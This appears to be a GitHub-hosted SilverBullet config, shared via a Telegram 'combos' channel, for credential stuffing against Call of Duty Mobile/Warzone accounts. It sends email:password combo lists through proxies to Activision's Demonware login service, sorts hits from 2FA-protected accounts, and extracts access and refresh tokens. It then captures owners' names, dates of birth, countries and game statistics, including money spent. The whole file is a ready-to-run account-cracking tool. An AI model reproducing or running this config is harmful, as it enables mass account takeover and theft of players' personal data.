-
Notifications
You must be signed in to change notification settings - Fork 1
/
COD Mobile Warzone.svb
178 lines (141 loc) · 6.4 KB
/
COD Mobile Warzone.svb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
[SETTINGS]
{
"Name": "COD Mobile Warzone",
"SuggestedBots": 100,
"MaxCPM": 0,
"LastModified": "2024-03-21T15:06:15.9364602+04:00",
"AdditionalInfo": "For more figs join us @configscombos2024",
"RequiredPlugins": [],
"Author": "🔥 @svbconfigmaker 🔥",
"Version": "1.1.3 [SB]",
"SaveEmptyCaptures": false,
"ContinueOnCustom": false,
"SaveHitsToTextFile": false,
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"BanLoopEvasionOverride": -1,
"EncodeData": false,
"AllowedWordlist1": "MailPass",
"AllowedWordlist2": "Default",
"DataRules": [],
"CustomInputs": [
{
"Description": "For more figs join us @configscombos2024",
"VariableName": "",
"Id": 1298314572
}
],
"CaptchaUrl": "",
"IsBase64": false,
"FilterList": [],
"EvaluateMathOCR": false,
"SecurityProtocol": 0,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"QuitOnBanRetry": false,
"AcceptInsecureCertificates": true,
"DisableNotifications": false,
"DisableImageLoading": false,
"DefaultProfileDirectory": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": "",
"Title": "COD Mobile Warzone",
"IconPath": "Icon\\svbfile.ico",
"LicenseSource": null,
"Message": null,
"MessageColor": "#FFFFFFFF",
"HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
"AuthorColor": "#FFFFB266",
"WordlistColor": "#FFB5C2E1",
"BotsColor": "#FFA8FFFF",
"CustomInputColor": "#FFD6C7C7",
"CPMColor": "#FFFFFFFF",
"ProgressColor": "#FFAD93E3",
"HitsColor": "#FF66FF66",
"CustomColor": "#FFFFB266",
"ToCheckColor": "#FF7FFFD4",
"FailsColor": "#FFFF3333",
"RetriesColor": "#FFFFFF99",
"OcrRateColor": "#FF4698FD",
"ProxiesColor": "#FFFFFFFF"
}
[SCRIPT]
#LOGIN REQUEST POST "https://wzm-ios-loginservice.prod.demonware.net/v1/login/uno/?titleID=7100&client=atvimobile-cod-wzm-ios"
CONTENT "{\"version\":1492,\"platform\":\"ios\",\"hardwareType\":\"ios\",\"auth\":{\"email\":\"<USER>\",\"password\":\"<PASS>\"}}"
CONTENTTYPE "application/json"
HEADER "Host: wzm-ios-loginservice.prod.demonware.net"
HEADER "Content-Type: application/json"
HEADER "Accept: */*"
HEADER "Upload-Incomplete: ?0"
HEADER "Upload-Draft-Interop-Version: 3"
HEADER "Dw-Trace: tr=13337015829863052714; sp=e75ba824; ss=4636242142480628779"
HEADER "Accept-Language: en-GB,en;q=0.9"
HEADER "Accept-Encoding: gzip, deflate, br"
HEADER "Content-Length: 127"
HEADER "User-Agent: Midnight/202403140 CFNetwork/1492.0.1 Darwin/23.3.0"
HEADER "X-Bdversion: 8.31.1-master"
HEADER "X-Transactionid: 13337015829863052714"
HEADER "Connection: close"
KEYCHECK
KEYCHAIN Failure OR
KEY "The provided credentials are invalid."
KEY "Error:ClientError:Unauthorized"
KEYCHAIN Custom "2FACTOR" OR
KEY "Uno2FAChallenge"
KEY "2FA Required"
KEYCHAIN Success OR
KEY "accessToken"
KEY "\"refreshToken\": \""
#TOKEN PARSE "<SOURCE>" LR "\"accessToken\": \"" "\"" -> VAR "YashvirGaming"
#REFRESH_TOKEN PARSE "<SOURCE>" LR "\"refreshToken\": \"" "\"" -> VAR "RTK"
#IDTOKEN PARSE "<SOURCE>" LR "\"IDToken\": \"" "\"" -> VAR "TOK2"
#accountID PARSE "<SOURCE>" LR "\"accounts\": [{\"accountID\": " "," -> VAR "accountID"
#titleID PARSE "<SOURCE>" LR "\"titleID\": " "," -> VAR "titleID"
#userID PARSE "<SOURCE>" LR "\"userID\": " "," -> VAR "userID"
#FIRSTNAME PARSE "<SOURCE>" LR "\"firstName\": \"" "\"" -> VAR "FN"
#NAME PARSE "<SOURCE>" LR "\"lastName\": \"" "\"" CreateEmpty=FALSE -> CAP "Name" "<FN> " ""
#MEMBERSINCE PARSE "<SOURCE>" LR "\"created\": \"" "T" CreateEmpty=FALSE -> CAP "memberSince"
#DOB PARSE "<SOURCE>" LR "\"dateOfBirth\": \"" "\"" CreateEmpty=FALSE -> CAP "DOB"
#PHONE_VERIFIED PARSE "<SOURCE>" LR "\"phoneVerified\": " "," CreateEmpty=FALSE -> CAP "phoneVerified"
#EMAIL_VERIFIED PARSE "<SOURCE>" LR "\"emailVerified\": " "," CreateEmpty=FALSE -> CAP "emailVerified"
#ACC_TYPE PARSE "<SOURCE>" LR "\"accountType\": \"" "\"" CreateEmpty=FALSE -> CAP "accountType"
#CROSSPLAY PARSE "<SOURCE>" LR "\"crossplayEnabled\": " "," CreateEmpty=FALSE -> CAP "crossplayEnabled"
#TFAEnabled PARSE "<SOURCE>" LR "\"TFAEnabled\": " "," CreateEmpty=FALSE -> CAP "TFAEnabled"
#COUNTRY PARSE "<SOURCE>" LR "\"country\": \"" "\"" CreateEmpty=FALSE -> CAP "Country"
#API_STATS REQUEST GET "https://telescope.callofduty.com/api/ts-api/cr/v1/title/mgl/lifetime?language=english"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
HEADER "Authorization: Bearer <YashvirGaming>"
KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Success OR
KEY "\"data\":{\"genericStats\":{\"totalTimePlayed\":"
KEY "\"matchesData\":[{\"matchId\":\""
KEYCHAIN Custom "CUSTOM" OR
KEY "\"matchesData\":[]"
KEY "\"data\":null,"
KEY "<SOURCE>" DoesNotContain "\"data\":{\"genericStats"
#GAMERTAG PARSE "<SOURCE>" LR "\"gamertag\":\"" "\"}}" CreateEmpty=FALSE -> CAP "Gamertag"
#GAMESPLAYED PARSE "<SOURCE>" LR "\"totalGamesPlayed\":" "," CreateEmpty=FALSE -> CAP "totalGamesPlayed"
#WARZONE_WINS PARSE "<SOURCE>" LR "\"wzWins\":" "," CreateEmpty=FALSE -> CAP "Warzone Wins"
#TOTAL_KILLS PARSE "<SOURCE>" LR "\"kills\":" "," CreateEmpty=FALSE -> CAP "Total Kills"
#TOTAL_SCORES PARSE "<SOURCE>" LR "\"score\":" "," CreateEmpty=FALSE -> CAP "Total Scores"
#KD_RATIO PARSE "<SOURCE>" LR "\"kdRatio\":\"" "\"" CreateEmpty=FALSE -> CAP "kdRatio"
#TOTAL_LOSSES PARSE "<SOURCE>" LR "\"losses\":" "," CreateEmpty=FALSE -> CAP "Total Losses"
#TOTAL_WINS PARSE "<SOURCE>" LR "\"wins\":" "," CreateEmpty=FALSE -> CAP "Total Wins"
#XP_LEVEL PARSE "<SOURCE>" LR "\"level\":" "," CreateEmpty=FALSE -> CAP "Level (XP)"
#MAPNAME PARSE "<SOURCE>" LR "\"mapName\":" "," CreateEmpty=FALSE -> CAP "Map Name"
#GAME_MODE PARSE "<SOURCE>" LR "\"mode\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Gamemode"
#LOADOUT PARSE "<SOURCE>" LR "\"label\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Weapons Loadout"
#COD_POINTS PARSE "<SOURCE>" LR "\"cashSpent\":" "," CreateEmpty=FALSE -> CAP "CodPoints"
#AUTHOR FUNCTION Constant "🔥 @svbconfigmaker 🔥" -> CAP "Config By "
KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Custom "2FACTOR" OR
KEY "<TFAEnabled>" Contains "true"